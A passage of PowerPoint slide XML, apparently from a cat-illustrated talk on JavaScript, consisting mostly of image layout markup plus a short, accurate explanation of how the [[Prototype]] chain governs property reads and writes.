            <a:xfrm rot="467748">
              <a:off x="6866490" y="3410571"/>
              <a:ext cx="1851176" cy="567874"/>
              <a:chOff x="388156" y="3369336"/>
              <a:chExt cx="1851176" cy="567874"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="55" name="Picture 54">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3BCB496-01E9-D17E-4A84-80698EA657AE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="388156" y="3568709"/>
                <a:ext cx="1851176" cy="368501"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="56" name="Picture 55" descr="A cat with a black background&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1D37AE2-5FF6-11DE-C366-87D3F5D22B68}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1726623" y="3369336"/>
                <a:ext cx="512709" cy="512709"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="57" name="Group 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D04FBA3-08DB-CBAE-84FD-895F02B464F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="346891" y="4181976"/>
              <a:ext cx="1851176" cy="567874"/>
              <a:chOff x="388156" y="3369336"/>
              <a:chExt cx="1851176" cy="567874"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="58" name="Picture 57">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E123EE2D-C01F-4C5A-45FE-D173C7CCAFE5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="388156" y="3568709"/>
                <a:ext cx="1851176" cy="368501"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="59" name="Picture 58" descr="A cat with a black background&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A14CC02-1910-11CE-52FE-300EA19D35FE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1726623" y="3369336"/>
                <a:ext cx="512709" cy="512709"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="60" name="Group 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8767B292-F861-CC9B-282D-F1E31DD7A47E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="21379662">
              <a:off x="2717267" y="4280897"/>
              <a:ext cx="1851176" cy="567874"/>
              <a:chOff x="388156" y="3369336"/>
              <a:chExt cx="1851176" cy="567874"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="61" name="Picture 60">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{755ACBFE-9ED4-2D61-C655-BF2C1FFE3AD2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="388156" y="3568709"/>
                <a:ext cx="1851176" cy="368501"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="62" name="Picture 61" descr="A cat with a black background&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FC1F5B1-C351-9358-01A4-12B36B8574E8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1726623" y="3369336"/>
                <a:ext cx="512709" cy="512709"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="91" name="Group 90">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A44D616-8CD8-C148-29D7-BFA4825BA466}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5261101" y="4237618"/>
              <a:ext cx="1352746" cy="553670"/>
              <a:chOff x="5261101" y="4237618"/>
              <a:chExt cx="1352746" cy="553670"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="16" name="Picture 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17EDD240-A934-C4F3-3A0E-EB4D25CE9BF3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5261101" y="4351861"/>
                <a:ext cx="1352746" cy="439427"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="90" name="Picture 89" descr="A cartoon of a yellow object with eyes&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98B4F6A6-0A3B-1FD6-CB39-2BB369E87EDA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6212114" y="4237618"/>
                <a:ext cx="348401" cy="348401"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="801916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Prototype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“Why awe you hate m-meow?!?1 Me *screeches* is god!!11”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>What does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9B8D8F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[[Prototype]]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> affect?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>It affects accessing a property for both reading and writing [1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>For reading a property named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>, starting from the original object, the first object along the prototype chain (including the original object) that has a property named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> is searched for. Then the read operation is performed on that property as if it is on the original object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>If no object with such property is found, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>undefined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> is returned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>For writing, it is similar, except that either the property setter is called or the property is written to the original object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-HK"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https://tc39.es/ecma262/#sec-ordinary-object-internal-methods-and-internal-slots</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44" descr="A yellow cat with black lines&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDCF40A1-3C29-3625-417A-DAEB9DDB4BC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7483296" y="1321199"/>
            <a:ext cx="713981" cy="713981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="121" name="Group 120">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68A426F0-BC08-3FF1-D1E2-EBF409A4D75C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="50263" y="3684487"/>
            <a:ext cx="9034739" cy="1496413"/>
            <a:chOff x="50263" y="3556018"/>
            <a:chExt cx="9034739" cy="1496413"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="113" name="Group 112">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2361F311-2BC8-3EC8-9E10-6F106084B05B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2545053" y="3820103"/>
              <a:ext cx="6539949" cy="641176"/>
              <a:chOff x="2543116" y="3848104"/>
              <a:chExt cx="6539949" cy="641176"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="TextBox 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0EB3367-AB7E-0B35-9A0C-A913691E1525}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8402843" y="4008453"/>
                <a:ext cx="680222"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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="16" name="Connector: Curved 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1599C4B2-05D8-896E-B33B-DF05B2CFC249}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="9" idx="3"/>
                <a:endCxn id="11" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4697592" y="4162341"/>
                <a:ext cx="180814" cy="63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1813E88F-0D63-F17E-19DC-A730206E62EB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="3"/>
                <a:endCxn id="13" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6601821" y="4168692"/>
                <a:ext cx="292291" cy="63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1176E082-70BA-D07F-A4CC-C8399FD838EA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="13" idx="3"/>
                <a:endCxn id="14" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="8185570" y="4162342"/>
                <a:ext cx="217273"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D7A03738-AA7E-8988-8C0D-D988C69432C3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2543116" y="3866659"/>
                <a:ext cx="2154476" cy="582263"/>
                <a:chOff x="2543116" y="3866659"/>
                <a:chExt cx="2154476" cy="582263"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="9" name="Picture 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08352024-2BA5-A4C3-27C6-038AF4933B65}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr>
                  <a:picLocks noChangeAspect="1"/>
                </p:cNvPicPr>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2543116" y="3875760"/>
                  <a:ext cx="2154476" cy="573162"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="47" name="Picture 46" descr="A black cat with a exclamation mark&#10;&#10;Description automatically generated">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DCD2BD1-4B00-1102-4DE1-DBC82DBCF7D6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr>
                  <a:picLocks noChangeAspect="1"/>
                </p:cNvPicPr>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId6"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3569388" y="3866659"/>
                  <a:ext cx="379111" cy="379111"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="97" name="Group 96">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B922332E-5FBD-BFBA-8D64-2FDC1135C56F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4878406" y="3848104"/>
                <a:ext cx="1723415" cy="641176"/>
                <a:chOff x="4878406" y="3848104"/>
                <a:chExt cx="1723415" cy="641176"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="11" name="Picture 10">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F2407CD-CDC0-776B-943A-18F1FA594E61}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr>
                  <a:picLocks noChangeAspect="1"/>
                </p:cNvPicPr>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4878406" y="3848104"/>
                  <a:ext cx="1723415" cy="641176"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="48" name="Picture 47" descr="A black cat with a exclamation mark&#10;&#10;Description automatically generated">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23453513-366E-C5E5-7CD1-2AEE795BF246}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr>
                  <a:picLocks noChangeAspect="1"/>
                </p:cNvPicPr>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId6"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5764886" y="3972785"/>
                  <a:ext cx="379111" cy="379111"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="98" name="Group 97">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{342BD34D-93B2-3F49-315F-CF4CC4E06AAE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6894112" y="3896051"/>
                <a:ext cx="1291458" cy="557982"/>
                <a:chOff x="6894112" y="3896051"/>
                <a:chExt cx="1291458" cy="557982"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="13" name="Picture 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C983C2BE-0D7A-6013-BB5C-76000C669CF2}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr>
                  <a:picLocks noChangeAspect="1"/>
                </p:cNvPicPr>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId8"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6894112" y="3896051"/>
                  <a:ext cx="1291458" cy="557982"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="49" name="Picture 48" descr="A black cat with a exclamation mark&#10;&#10;Description automatically generated">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80FA7EC8-4F27-E1DE-53FD-3B314F242DA0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr>
                  <a:picLocks noChangeAspect="1"/>
                </p:cNvPicPr>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId6"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7654184" y="4033275"/>
                  <a:ext cx="379111" cy="379111"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="120" name="Group 119">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAD1E458-6499-6487-CC22-D7A31F9D4B7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="50263" y="3556018"/>
              <a:ext cx="8694629" cy="1496413"/>
              <a:chOff x="50263" y="3556018"/>
              <a:chExt cx="8694629" cy="1496413"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="106" name="Group 105">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBB74DF0-7583-F26D-EB5E-8F3D754FF038}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="192588" y="3556018"/>
                <a:ext cx="2621334" cy="584673"/>
                <a:chOff x="190651" y="3584019"/>
                <a:chExt cx="2621334" cy="584673"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="43" name="TextBox 42">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07B17F04-A471-6BA3-8CF9-F7BBC0F8A910}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="190651" y="3584019"/>
                  <a:ext cx="1337004" cy="276999"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-HK" sz="1200" b="0" i="0" dirty="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="434F54"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>temp.a</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-HK" sz="1200" b="0" i="0" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="434F54"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t> === </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-HK" sz="1200" b="0" i="0" dirty="0">
